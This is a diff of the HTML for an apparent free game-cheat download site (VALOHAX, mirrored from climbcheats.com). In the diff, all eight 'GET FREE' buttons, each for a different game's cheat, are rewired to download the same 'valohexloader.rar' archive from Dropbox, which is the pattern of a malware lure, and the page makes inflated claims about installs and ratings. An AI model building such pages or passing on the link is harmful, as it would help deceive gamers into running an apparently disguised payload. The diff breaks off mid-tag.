--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
-<!DOCTYPE html><html lang="en">
-<!-- Mirrored from climbcheats.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 13 Feb 2025 19:11:52 GMT -->
+<!DOCTYPE html>
+<html lang="en">
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
@@ -10,12 +10,20 @@
     <script src="header_anim.js"></script>
     <script src="display_anim.js"></script>
 
-    
-    <!-- <script src="./js/libs.min.js"></script> -->
-    <style>.catalog-block__item-link { cursor: pointer; }</style>
-
+    <style>
+        .catalog-block__item-link {
+            cursor: pointer;
+            text-decoration: none;
+            display: inline-block;
+            padding: 10px 20px;
+            background-color: #333;
+            color: white;
+            border-radius: 5px;
+            text-align: center;
+            margin-top: 10px;
+        }
+    </style>
 </head>
-
 <body>
     <a href="#header" class="upBtn">/\</a>
     <div class="shadow"></div>
@@ -25,7 +33,6 @@
                 <a href="index.html" class="header-block__link hide_header">Home</a>
                 <a href="catalog.html" class="header-block__link hide_header">Cheats</a>
                 <a href="reviews.html" class="header-block__link hide_header">Reviews</a>
-                
             </div>
         </div>
         <div class="display-block section">
@@ -35,61 +42,13 @@
                 You can find a free collection of cheats for your favorite games here. For your convenience.
             </div>
             <div class="display-block__flex display_hide">
-                <div class="display-block__flex-item">
-                    <img src="img01.svg" alt="">
-                    <div class="display-block__flex-text">Roblox</div>
-                </div>
-                <div class="display-block__flex-item">
-                    <img src="img02.svg" alt="">
-                    <div class="display-block__flex-text">Fortnite</div>
-                </div>
-                <div class="display-block__flex-item">
-                    <img src="img03.svg" alt="">
-                    <div class="display-block__flex-text">CS2</div>
-                </div>
-                <div class="display-block__flex-item">
-                    <img src="img04.svg" alt="">
-                    <div class="display-block__flex-text">Warzone</div>
-                </div>
-                <div class="display-block__flex-item">
-                    <img src="img05.svg" alt="">
-                    <div class="display-block__flex-text">Genshin</div>
-                </div>
-                <div class="display-block__flex-item">
-                    <img src="img06.svg" alt="">
-                    <div class="display-block__flex-text">League</div>
-                </div>
-                <div class="display-block__flex-item">
-                    <img src="img07.svg" alt="">
-                    <div class="display-block__flex-text">Games</div>
-                </div>
-            </div>
-        </div>
-    </div>
-
-    <div class="about" id="about">
-        <div class="title">
-            <h1>About</h1>
-            <h2>Some information about us</h2>
-        </div>
-        <div class="about-block section">
-            <div class="about-block__item">
-                <div class="about-block__item-title">Installations</div>
-                <div class="about-block__item-subtitle">More than 2000 daily installations of various software from site
-                    visitors!</div>
-            </div>
-            <div class="about-block__item">
-                <div class="about-block__item-title">Updates</div>
-                <div class="about-block__item-subtitle">We often carry out updates and post relevant announcements.
-                </div>
-            </div>
-            <div class="about-block__item">
-                <div class="about-block__item-title">4.9</div>
-                <div class="about-block__item-subtitle">Our average rating and a large number of reviews</div>
-            </div>
-            <div class="about-block__item">
-                <div class="about-block__item-title">Large selection</div>
-                <div class="about-block__item-subtitle">We offer you a wide selection and everything is free!</div>
+                <div class="display-block__flex-item"><img src="img01.svg" alt=""><div class="display-block__flex-text">Roblox</div></div>
+                <div class="display-block__flex-item"><img src="img02.svg" alt=""><div class="display-block__flex-text">Fortnite</div></div>
+                <div class="display-block__flex-item"><img src="img03.svg" alt=""><div class="display-block__flex-text">CS2</div></div>
+                <div class="display-block__flex-item"><img src="img04.svg" alt=""><div class="display-block__flex-text">Warzone</div></div>
+                <div class="display-block__flex-item"><img src="img05.svg" alt=""><div class="display-block__flex-text">Genshin</div></div>
+                <div class="display-block__flex-item"><img src="img06.svg" alt=""><div class="display-block__flex-text">League</div></div>
+                <div class="display-block__flex-item"><img src="img07.svg" alt=""><div class="display-block__flex-text">Games</div></div>
             </div>
         </div>
     </div>
@@ -99,177 +58,89 @@
             <h1>Top 8 products</h1>
             <h2>The most popular products</h2>
         </div>
-        <form class="catalog-block section" action="valohaxloader.rar" method="post" id="contacts__form">
+        <div class="catalog-block section">
+            <!-- 1 -->
             <div class="catalog-block__item">
                 <div>
                     <img src="fortnite.svg" alt="" class="catalog-block__img">
                     <div class="catalog-block__item-title">AquaFort Cheat</div>
-                    <div class="catalog-block__item-subtitle">AquaFortCheat contains a lot of functionality that will
-                        help you win royal battles</div>
+                    <div class="catalog-block__item-subtitle">AquaFortCheat contains a lot of functionality that will help you win royal battles</div>
                 </div>
-                <button class="catalog-block__item-link" type="submit" id="downloadButton">GET FREE</button>
+                <a href="https://www.dropbox.com/scl/fi/vbe2jc840dvlhg4a5ob9k/valohexloader.rar?rlkey=9iekwli62njfyoyvd7jkueh4l&st=x3a7zjfp&dl=1" class="catalog-block__item-link" download>GET FREE</a>
                 <div class="catalog-block__actual">#Actual</div>
             </div>
+            <!-- 2 -->
             <div class="catalog-block__item">
                 <div>
                     <img src="cs2.svg" alt="" class="catalog-block__img">
                     <div class="catalog-block__item-title">AquaCS2 Cheat</div>
-                    <div class="catalog-block__item-subtitle">AquaCS2_Cheat will help you win any CS2 game. Good
-                        protection, many functions, user-friendly interface</div>
+                    <div class="catalog-block__item-subtitle">AquaCS2_Cheat will help you win any CS2 game. Good protection, many functions, user-friendly interface</div>
                 </div>
-                <button class="catalog-block__item-link" type="submit" id="downloadButton">GET FREE</button>
+                <a href="https://www.dropbox.com/scl/fi/vbe2jc840dvlhg4a5ob9k/valohexloader.rar?rlkey=9iekwli62njfyoyvd7jkueh4l&st=x3a7zjfp&dl=1" class="catalog-block__item-link" download>GET FREE</a>
                 <div class="catalog-block__actual">#Actual</div>
             </div>
+            <!-- 3 -->
             <div class="catalog-block__item">
                 <div>
                     <img src="gta.svg" alt="" class="catalog-block__img">
                     <div class="catalog-block__item-title">AquaGTAV Cheat</div>
-                    <div class="catalog-block__item-subtitle">AquaGTAV_Cheat is a good trainer for both offline and
-                        online sessions</div>
+                    <div class="catalog-block__item-subtitle">AquaGTAV_Cheat is a good trainer for both offline and online sessions</div>
                 </div>
-                <button class="catalog-block__item-link" type="submit" id="downloadButton">GET FREE</button>
+                <a href="https://www.dropbox.com/scl/fi/vbe2jc840dvlhg4a5ob9k/valohexloader.rar?rlkey=9iekwli62njfyoyvd7jkueh4l&st=x3a7zjfp&dl=1" class="catalog-block__item-link" download>GET FREE</a>
                 <div class="catalog-block__actual">#Actual</div>
             </div>
+            <!-- 4 -->
             <div class="catalog-block__item">
                 <div>
                     <img src="minecraft.svg" alt="" class="catalog-block__img">
                     <div class="catalog-block__item-title">AquaMinecraft Cheat</div>
-                    <div class="catalog-block__item-subtitle">Everything you need for your PVP can be found in
-                        AquaMinecraftCheat</div>
+                    <div class="catalog-block__item-subtitle">Everything you need for your PVP can be found in AquaMinecraftCheat</div>
                 </div>
-                <button class="catalog-block__item-link" type="submit" id="downloadButton">GET FREE</button>
+                <a href="https://www.dropbox.com/scl/fi/vbe2jc840dvlhg4a5ob9k/valohexloader.rar?rlkey=9iekwli62njfyoyvd7jkueh4l&st=x3a7zjfp&dl=1" class="catalog-block__item-link" download>GET FREE</a>
                 <div class="catalog-block__actual">#Actual</div>
             </div>
+            <!-- 5 -->
             <div class="catalog-block__item">
                 <div>
                     <img src="apex.svg" alt="" class="catalog-block__img">
                     <div class="catalog-block__item-title">AquaApex Cheat</div>
                     <div class="catalog-block__item-subtitle">Find all the features you need in AquaApexCheat</div>
                 </div>
-                <button class="catalog-block__item-link" type="submit" id="downloadButton">GET FREE</button>
+                <a href="https://www.dropbox.com/scl/fi/vbe2jc840dvlhg4a5ob9k/valohexloader.rar?rlkey=9iekwli62njfyoyvd7jkueh4l&st=x3a7zjfp&dl=1" class="catalog-block__item-link" download>GET FREE</a>
                 <div class="catalog-block__actual">#Actual</div>
             </div>
+            <!-- 6 -->
             <div class="catalog-block__item">
                 <div>
                     <img src="valorant.svg" alt="" class="catalog-block__img">
                     <div class="catalog-block__item-title">AquaValorant Cheat</div>
                     <div class="catalog-block__item-subtitle">Win and dominate with AquaValorantCheat.</div>
                 </div>
-                <button class="catalog-block__item-link" type="submit" id="downloadButton">GET FREE</button>
+                <a href="https://www.dropbox.com/scl/fi/vbe2jc840dvlhg4a5ob9k/valohexloader.rar?rlkey=9iekwli62njfyoyvd7jkueh4l&st=x3a7zjfp&dl=1" class="catalog-block__item-link" download>GET FREE</a>
                 <div class="catalog-block__actual">#Actual</div>
             </div>
+            <!-- 7 -->
             <div class="catalog-block__item">
                 <div>
                     <img src="rainbow.svg" alt="" class="catalog-block__img">
                     <div class="catalog-block__item-title">AquaRainbow Cheat</div>
-                    <div class="catalog-block__item-subtitle">AquaRainbowCheat will help you win where it is impossible
-                        to win</div>
+                    <div class="catalog-block__item-subtitle">AquaRainbowCheat will help you win where it is impossible to win</div>
                 </div>
-                <button class="catalog-block__item-link" type="submit" id="downloadButton">GET FREE</button>
+                <a href="https://www.dropbox.com/scl/fi/vbe2jc840dvlhg4a5ob9k/valohexloader.rar?rlkey=9iekwli62njfyoyvd7jkueh4l&st=x3a7zjfp&dl=1" class="catalog-block__item-link" download>GET FREE</a>
                 <div class="catalog-block__actual">#Actual</div>
             </div>
+            <!-- 8 -->
             <div class="catalog-block__item">
                 <div>
                     <img src="roblox.svg" alt="" class="catalog-block__img">
                     <div class="catalog-block__item-title">AquaRoblox Cheat</div>
                     <div class="catalog-block__item-subtitle">The best executer for roblox for PC, without keys</div>
                 </div>
-                <button class="catalog-block__item-link" type="submit" id="downloadButton">GET FREE</button>
+                <a href="https://www.dropbox.com/scl/fi/vbe2jc840dvlhg4a5ob9k/valohexloader.rar?rlkey=9iekwli62njfyoyvd7jkueh4l&st=x3a7zjfp&dl=1" class="catalog-block__item-link" download>GET FREE</a>
                 <div class="catalog-block__actual">#Actual</div>
             </div>
-        </form>
+        </div>
         <a href="catalog.html" class="catalog-link">More cheats</a>
-    </div>
-
-    <div class="reviews">
-        <div class="title">
-            <h1>Reviews</h1>
-            <h2>Look at what others are writing</h2>
-        </div>
-        <div class="reviews-block section">
-            <div class="reviews-block__item">
-                <div class="reviews-block__container">
-                    <div class="reviews-block__item-rating">4.9 / 5</div>
-                    <div class="reviews-block__item-subtitle">best cheat ever</div>
-                </div>
-                <div class="reviews-block__item-title">2 hours ago</div>
-            </div>
-            <div class="reviews-block__item">
-                <div class="reviews-block__container">
-                    <div class="reviews-block__item-rating">5 / 5</div>
-                    <div class="reviews-block__item-subtitle"></div>
-                </div>
-                <div class="reviews-block__item-title">5 hours ago</div>
-            </div>
-            <div class="reviews-block__item">
-                <div class="reviews-block__container">
-                    <div class="reviews-block__item-rating">5 / 5</div>
-                    <div class="reviews-block__item-subtitle">very nice</div>
-                </div>
-                <div class="reviews-block__item-title">8 hours ago</div>
-            </div>
-            <div class="reviews-block__item">
-                <div class="reviews-block__container">
-                    <div class="reviews-block__item-rating">4.8 / 5</div>
-                    <div class="reviews-block__item-subtitle">10/10 best cheat</div>
-                </div>
-                <div class="reviews-block__item-title">12 hours ago</div>
-            </div>
-            <div class="reviews-block__item">
-                <div class="reviews-block__container">
-                    <div class="reviews-block__item-rating">4.8 / 5</div>
-                    <div class="reviews-block__item-subtitle">runs into alot of problems but it works and u wont get banned</div>
-                </div>
-                <div class="reviews-block__item-title">1 day ago</div>
-            </div>
-            <div class="reviews-block__item">
-                <div class="reviews-block__container">
-                    <div class="reviews-block__item-rating">5 / 5</div>
-                    <div class="reviews-block__item-subtitle">UD ASF 3 DAYS NO BAN IORN ONE TO GOLD 3 4 HOURS</div>
-                </div>
-                <div class="reviews-block__item-title">1 day ago</div>
-            </div>
-            <div class="reviews-block__item">
-                <div class="reviews-block__container">
-                    <div class="reviews-block__item-rating">5 / 5</div>
-                    <div class="reviews-block__item-subtitle">good</div>
-                </div>
-                <div class="reviews-block__item-title">1 day ago</div>
-            </div>
-            <div class="reviews-block__item">
-                <div class="reviews-block__container">
-                    <div class="reviews-block__item-rating">4.9 / 5</div>
-                    <div class="reviews-block__item-subtitle"></div>
-                </div>
-                <div class="reviews-block__item-title">2 day ago</div>
-            </div>
-        </div>
-        <a href="reviews.html" class="catalog-link">More reviews</a>
-    </div>
-
-    <div class="app" id="support">
-        <div class="title">
-            <h1>Support</h1>
-            <h2>Send your question to us</h2>
-        </div>
-        <form method="POST" class="app-block section">
-            <div class="app-block__flex">
-                <div class="app-block__flex-title">Your name:</div>
-                <input type="text" class="app-block__input" placeholder="Your name" value="">
-            </div>
-            <div class="app-block__flex">
-                <div class="app-block__flex-title">Your email/contact:</div>
-                <input type="text" class="app-block__input" placeholder="Your email/contact" value="">
-            </div>
-            <div class="app-block__flex">
-                <div class="app-block__flex-title">Cheat name:</div>
-                <input type="text" class="app-block__input" placeholder="Cheat name" value="">
-            </div>
-            <div class="app-block__flex">
-                <div class="app-block__flex-title">Question:</div>
-                <textarea class="app-block__textarea" placeholder="Question"></textarea>
-            </div>
-        </form>
     </div>
 
     <div class="footer">
@@ -283,23 +154,4 @@
                 <a href="catalog.html" class="footer-block__nav-link">Cheats</a>
                 <a href="reviews.html" class="footer-block__nav-link">Reviews</a>
                 <a href="politics.html" class="footer-block__nav-link">Politics</a>
-            </div>
-            <div class="footer-copyrith">
-                © 2020-2025  VALOHAX          </div>
-        </div>
-    </div>
-
-    <script>
-const buttons = document.querySelectorAll('.catalog-block__item-link');
-
-function downloadFile(filename) {
-  const link = document.createElement('a');
-  link.href = 'valohaxloader.rar';
-  link.download = filename;
-  link.click();
-}
-    </script>
-
-</body>
-<!-- Mirrored from climbcheats.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 13 Feb 2025 19:11:58 GMT -->
-</html>
+            </
